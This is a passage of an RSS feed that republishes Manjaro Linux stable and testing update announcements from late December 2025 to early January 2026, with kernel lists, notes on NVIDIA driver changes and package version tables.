<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/25.12.1/">25.12.1</a></li>
<li><strong>Haskell</strong> <a href="https://hackage.haskell.org/package/haskell-language-server-2.2.0.0/changelog">2.2.0</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.3.html">25.3.3</a></li>
</ul>
<h2><a name="p-822371-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-822371-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.64</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.4</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/8/26 21:25 CET)</p>
<ul>
<li>testing core x86_64:  16 new and 16 removed package(s)</li>
<li>testing extra x86_64:  1295 new and 1300 removed package(s)</li>
<li>testing multilib x86_64:  22 new and 21 removed package(s)</li>
</ul>
<p>List of changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1180/raw">here</a></p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-09-kernels-kde-gear-25-12-1-mesa-25-3-3-haskell/184723">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Stable Update] 2026-01-04 - Manjaro 26.0, Mesa, Firefox, LibreOffice, Cosmic]]></title>
<description><![CDATA[Hello community, first of all: “Happy 2026!” We hope you all had a good start into the new year. We wish you all the best. Here we have another set of package updates. This also marks the release of Manjaro 26.0, code-named ‘Anh-Linh’. This time our focus is on Plasma 6.5 and GNOME 49. Both will ...]]></description>
<link>https://tsecurity.de/de/3193454/unix-server/stable-update-2026-01-04-manjaro-260-mesa-firefox-libreoffice-cosmic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3193454/unix-server/stable-update-2026-01-04-manjaro-260-mesa-firefox-libreoffice-cosmic/</guid>
<pubDate>Sun, 04 Jan 2026 17:01:13 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, first of all: “Happy 2026!” We hope you all had a good start into the new year. We wish you all the best. Here we have another set of package updates. This also marks the release of Manjaro 26.0, code-named ‘Anh-Linh’. This time our focus is on Plasma 6.5 and GNOME 49. Both will use Wayland by default, which may change things for older systems out there. Some who still need X11 support may consider our XFCE build. Expect the new ISOs for installation of Manjaro soon to be published.</p>
<p>Important Note: <mark>Users of <strong>Plasma</strong> and <strong>GNOME</strong> may lose their <strong>X11</strong> session support. Therefore read our <strong><a href="https://forum.manjaro.org/t/184517/2">Known issues and solutions</a> section</strong> before restarting your systems! </mark></p>
<p>Important Note: <mark>Users of Pascal, Maxwell, or older cards will fail to load the NVIDIA driver when 580xx series got used since 590xx doesn’t support the older hardware anymore. Only Turing series and newer. Therefore read our <strong><a href="https://forum.manjaro.org/t/184517/2">Known issues and solutions</a> section</strong> before restarting your systems! </mark></p>
<h3><a name="p-820869-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-820869-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-820869-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-820869-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">(click for more details)</a>
<ul>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">(click for more details)</a>
<h2><a name="p-820869-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-820869-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/259267/">590.48.01</a>
<ul>
<li>590xx doesn’t support the older hardware anymore. Only Turing series and newer. Therefore read our <strong><a href="https://forum.manjaro.org/t/184517/2">Known issues and solutions</a> section</strong> before restarting your systems!</li>
<li>Updates to <strong>nvidia-driver-assistant</strong> to detect drivers for older cards better</li>
</ul>
</li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.2.html">25.3.2</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/146.0.1/releasenotes/">146.0.1</a></li>
<li><strong>LibreOffice</strong> <a href="https://blog.documentfoundation.org/blog/2025/12/18/libreoffice-25-8-4/">25.8.4</a></li>
<li><strong>GStreamer</strong> <a href="https://gstreamer.freedesktop.org/news/#2025-12-25T18:00:00Z">1.26.10</a></li>
<li><strong>Cosmic</strong> <a href="https://linuxiac.com/pop_os-24-04-lts-launches-with-cosmic-desktop-1-0-stable/">1.0.1</a></li>
<li><strong>ALSA</strong> <a href="https://www.alsa-project.org/wiki/Changes_v1.2.15_v1.2.15.1">1.2.15.1</a></li>
<li><strong>Wireplumber</strong> <a href="https://gitlab.freedesktop.org/pipewire/wireplumber/-/releases/0.5.13">0.5.13</a></li>
<li>Updates to <strong>Budgie</strong> and <strong>Cinnamon</strong> packages</li>
</ul>
<h2><a name="p-820869-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-820869-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.3</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/3/26 02:29 CET)</p>
<ul>
<li>stable core x86_64:  10 new and 10 removed package(s)</li>
<li>stable extra x86_64:  1258 new and 1380 removed package(s)</li>
<li>stable multilib x86_64:  29 new and 29 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1179/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/stable-update-2026-01-04-manjaro-26-0-mesa-firefox-libreoffice-cosmic/184517">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-03 - Cosmic 1.0.1, Budgie, NVIDIA-Driver-Assistant]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Manjaro 26.0, code-named ‘Anh-Linh’ is now super close for release. We already made 3 release candidates. Our focus is on Plasma 6.5 and GNOME 49. Both will use Wayland by default, which may change things for older systems out there. S...]]></description>
<link>https://tsecurity.de/de/3191605/unix-server/testing-update-2026-01-03-cosmic-101-budgie-nvidia-driver-assistant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3191605/unix-server/testing-update-2026-01-03-cosmic-101-budgie-nvidia-driver-assistant/</guid>
<pubDate>Sat, 03 Jan 2026 02:46:06 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Manjaro 26.0, code-named ‘Anh-Linh’ is now super close for release. We already made 3 release candidates. Our focus is on Plasma 6.5 and GNOME 49. Both will use Wayland by default, which may change things for older systems out there. Some who still need X11 support may consider our XFCE build.</p>
<h3><a name="p-820585-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-820585-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-820585-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-820585-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">(click for more details)</a>
<h2><a name="p-820585-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-820585-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Updates to <strong>nvidia-driver-assistant</strong> to detect drivers for older cards better</li>
<li><strong>Cosmic</strong> <a href="https://linuxiac.com/pop_os-24-04-lts-launches-with-cosmic-desktop-1-0-stable/">1.0.1</a></li>
<li>Updates to to <strong>Budgie</strong></li>
</ul>
<h2><a name="p-820585-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-820585-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.3</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/3/26 02:29 CET)</p>
<ul>
<li>testing core x86_64:  2 new and 2 removed package(s)</li>
<li>testing extra x86_64:  111 new and 107 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260101             20260103
-------------------------------------------------------------------------------
                            linux618             6.18.2-2             6.18.3-2
                    linux618-headers             6.18.2-2             6.18.3-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260101             20260103
-------------------------------------------------------------------------------
                    inputplumber-git 0.69.1.r0.g55d5edd-3 0.70.1.r0.g8425f13-1
                  linux618-acpi_call              1.2.2-5              1.2.2-7
                   linux618-bbswitch                0.8-5                0.8-7
                linux618-broadcom-wl       6.30.223.271-5       6.30.223.271-7
               linux618-nvidia-390xx            390.157-5            390.157-7
               linux618-nvidia-470xx         470.256.02-5         470.256.02-7
               linux618-nvidia-570xx            570.207-5            570.207-7
          linux618-nvidia-570xx-open            570.207-5            570.207-7
               linux618-nvidia-575xx          575.64.05-5          575.64.05-7
          linux618-nvidia-575xx-open          575.64.05-5          575.64.05-7
                     linux618-nvidia          590.48.01-2          590.48.01-4
                linux618-nvidia-open          590.48.01-2          590.48.01-4
                      linux618-r8168           8.055.00-5           8.055.00-7
                  linux618-rtl8723bu           20250813-5           20250813-7
                   linux618-tp_smapi               0.45-5               0.45-7
                linux618-vhba-module           20250329-5           20250329-7
    linux618-virtualbox-host-modules              7.2.4-5              7.2.4-7
                        linux618-zfs              2.3.5-3              2.3.5-5
              manjaro-pacnew-checker             0.6.11-1              0.7.2-1
                         mhwd-nvidia          590.48.01-1          590.48.01-2
                         nvidia-dkms          590.48.01-1          590.48.01-2
             nvidia-driver-assistant         0.23.48.01-5         0.23.48.01-6
                    nvidia-open-dkms          590.48.01-1          590.48.01-2
                     nvidia-settings          590.48.01-1          590.48.01-2
                        nvidia-utils          590.48.01-1          590.48.01-2
                       opencl-nvidia          590.48.01-1          590.48.01-2
                   opengamepadui-git0.42.3.r0.gdef7b75e-10.42.3.r0.gdef7b75e-2
                linux619-nvidia-open                    -        590.48.01-0.1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20260101             20260103
-------------------------------------------------------------------------------
                        alertmanager             0.29.0-1             0.30.0-1
                             ansible             13.1.0-1             13.2.0-1
                      arch-wiki-docs           20251202-1           20260102-1
                      arch-wiki-lite           20251202-2           20260102-1
                  budgie-backgrounds                3.0-1                3.0-2
               budgie-control-center              1.4.1-4              1.4.1-5
                      budgie-desktop             10.9.4-1             10.9.4-2
                 budgie-desktop-view                1.3-4                1.3-5
                       budgie-extras              1.9.0-2              2.0.0-2
                  budgie-screensaver              5.1.0-3              5.1.0-4
                      budgie-session              0.9.1-2              0.9.1-3
                       cargo-nextest            0.9.116-1            0.9.117-1
                     cargo-tarpaulin             0.34.1-1             0.35.0-1
                  cosmic-app-library            1:1.0.0-1            1:1.0.1-1
                      cosmic-applets            1:1.0.0-2            1:1.0.1-1
                           cosmic-bg            1:1.0.0-1            1:1.0.1-1
                         cosmic-comp            1:1.0.0-1            1:1.0.1-1
                        cosmic-files            1:1.0.0-1            1:1.0.1-1
                      cosmic-greeter            1:1.0.0-1            1:1.0.1-2
                   cosmic-icon-theme            1:1.0.0-1            1:1.0.1-1
                         cosmic-idle            1:1.0.0-1            1:1.0.1-1
                cosmic-initial-setup            1:1.0.0-1            1:1.0.1-1
                     cosmic-launcher            1:1.0.0-1            1:1.0.1-1
                cosmic-notifications            1:1.0.0-1            1:1.0.1-1
                          cosmic-osd            1:1.0.0-1            1:1.0.1-1
                        cosmic-panel            1:1.0.0-1            1:1.0.1-1
                       cosmic-player            1:1.0.0-1            1:1.0.1-1
                        cosmic-randr            1:1.0.0-1            1:1.0.1-1
                   cosmic-screenshot            1:1.0.0-1            1:1.0.1-1
                      cosmic-session            1:1.0.0-1            1:1.0.1-1
                     cosmic-settings            1:1.0.0-1            1:1.0.1-1
              cosmic-settings-daemon            1:1.0.0-1            1:1.0.1-1
                        cosmic-store            1:1.0.0-1            1:1.0.1-1
                     cosmic-terminal            1:1.0.0-1            1:1.0.1-1
                  cosmic-text-editor            1:1.0.0-1            1:1.0.1-1
                   cosmic-wallpapers            2:1.0.0-1            2:1.0.1-1
                   cosmic-workspaces            2:1.0.0-1            2:1.0.1-1
                            cppcheck             2.19.0-1             2.19.1-1
                        emptyepsilon         2024.08.09-1         2024.12.08-1
                             esphome          2025.12.1-1          2025.12.1-3
                             forgejo             13.0.3-1             13.0.3-2
                               fping                5.4-1                5.5-1
                          gemini-cli           1:0.22.4-1           1:0.22.5-1
                            gitoxide             0.48.0-1             0.49.0-1
                               glaze              6.4.1-1              6.5.0-1
                        gnome-sudoku               49.2-1               49.3-1
                             hashcat            1:7.1.2-1            1:7.1.2-2
                                hugo            0.153.3-1            0.154.2-1
                           hyprpaper              0.8.0-2              0.8.1-1
                     intel-gpu-tools                2.2-2                2.2-3
                                just             1.45.0-1             1.46.0-1
                            just-lsp              0.3.0-1              0.3.1-1
                               kicad              9.0.6-5              9.0.7-1
                    kicad-library-3d              9.0.6-1              9.0.7-1
                       kicad-library              9.0.6-1              9.0.7-1
                          latex2html               2025-1               2026-1
                             libheif             1.21.0-1             1.21.1-1
                             libkate              0.4.3-1              0.4.3-3
                              libqmi             1.36.0-1             1.38.0-1
                         libqmi-docs             1.36.0-1             1.38.0-1
                        libqrtr-glib              1.2.2-4              1.4.0-1
                   libqrtr-glib-docs              1.2.2-4              1.4.0-1
                          libtorrent             0.16.5-1             0.16.6-1
                               loupe               49.1-1               49.2-1
                           magpie-wm              0.9.4-1              0.9.4-2
                              miller             6.15.0-1             6.16.0-1
                               mimir              3.0.1-1              3.0.2-1
                       python-caldav              2.2.3-1              2.2.3-3
                    python-gitpython             3.1.45-1             3.1.46-1
              python-simplemediawiki          1.2.0_b2-11                    -
                              reaper               7.57-1               7.58-1
                            rtorrent             0.16.5-1             0.16.6-1
                           seaweedfs               4.04-1               4.05-1
                             slumber              4.3.0-1              4.3.1-1
                           typos-lsp             0.1.46-1             0.1.47-1
                              wifite            2:2.7.0-3            2:2.8.2-1
                       wireshark-cli              4.6.2-1              4.6.2-2
                        wireshark-qt              4.6.2-1              4.6.2-2
           xdg-desktop-portal-cosmic            1:1.0.0-1            1:1.0.1-1
                         zigbee2mqtt              2.7.1-1              2.7.2-1
                              bazaar                    -              0.7.0-2
                  python-hstspreload                    -          2025.12.3-1
           python-icalendar-searcher                    -              1.0.3-1
                 python-wiki-scripts                    -              1.5.1-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-03-cosmic-1-0-1-budgie-nvidia-driver-assistant/184487">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-01 - Wireplumber, NVIDIA Driver Assistant, ALSA]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Manjaro 26.0, code-named ‘Anh-Linh’ is now super close for release. We already made 3 release candidates. Our focus is on Plasma 6.5 and GNOME 49. Both will use Wayland by default, which may change things for older systems out there. S...]]></description>
<link>https://tsecurity.de/de/3189138/unix-server/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3189138/unix-server/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/</guid>
<pubDate>Thu, 01 Jan 2026 11:16:13 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Manjaro 26.0, code-named ‘Anh-Linh’ is now super close for release. We already made 3 release candidates. Our focus is on Plasma 6.5 and GNOME 49. Both will use Wayland by default, which may change things for older systems out there. Some who still need X11 support may consider our XFCE build.</p>
<h3><a name="p-820237-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-820237-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-820237-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-820237-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">(click for more details)</a>
<h2><a name="p-820237-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-820237-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Updates to <strong>nvidia-driver-assistant</strong> to detect drivers for older cards better</li>
<li><strong>ALSA</strong> <a href="https://www.alsa-project.org/wiki/Changes_v1.2.15_v1.2.15.1">1.2.15.1</a></li>
<li><strong>Wireplumber</strong> <a href="https://gitlab.freedesktop.org/pipewire/wireplumber/-/releases/0.5.13">0.5.13</a></li>
<li>Updates to <strong>Cinnamon</strong> packages</li>
</ul>
<h2><a name="p-820237-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-820237-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux54 5.4.302 [EOL]</li>
<li>linux510 5.10.247</li>
<li>linux515 5.15.197</li>
<li>linux61 6.1.159</li>
<li>linux66 6.6.119</li>
<li>linux612 6.12.63</li>
<li>linux617 6.17.13 [EOL]</li>
<li>linux618 6.18.2</li>
<li>linux619 6.19.0-rc3</li>
<li>linux61-rt 6.1.158_rt58</li>
<li>linux66-rt 6.6.116_rt66</li>
<li>linux612-rt 6.12.57_rt14</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (1/1/26 10:51 CET)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  335 new and 346 removed package(s)</li>
<li>testing multilib x86_64:  1 new and 1 removed package(s)</li>
</ul>
<p>A list of all changes can be found <a href="https://gitlab.manjaro.org/-/snippets/1176/raw">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-01-01-wireplumber-nvidia-driver-assistant-alsa/184429">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-12-29 - Mesa, NVIDIA 590xx, Firefox, LibreOffice, Gstreamer]]></title>
<description><![CDATA[Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0. Since only two day’s of 2025 are left, we may bump the version of ‘Anh-Linh...]]></description>
<link>https://tsecurity.de/de/3184962/unix-server/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3184962/unix-server/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/</guid>
<pubDate>Mon, 29 Dec 2025 20:01:12 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates. Welcome to our new development cycle of Manjaro 25.1.0, code-named ‘Anh-Linh’.We will focus on Plasma 6.5 series and will introduce GNOME 49, maybe Cosmic 1.0. Since only two day’s of 2025 are left, we may bump the version of ‘Anh-Linh’ also to 26.0 …</p>
<h3><a name="p-819841-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-819841-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-819841-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-819841-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2025-12-29-mesa-nvidia-590xx-firefox-libreoffice-gstreamer/184345/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.17 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

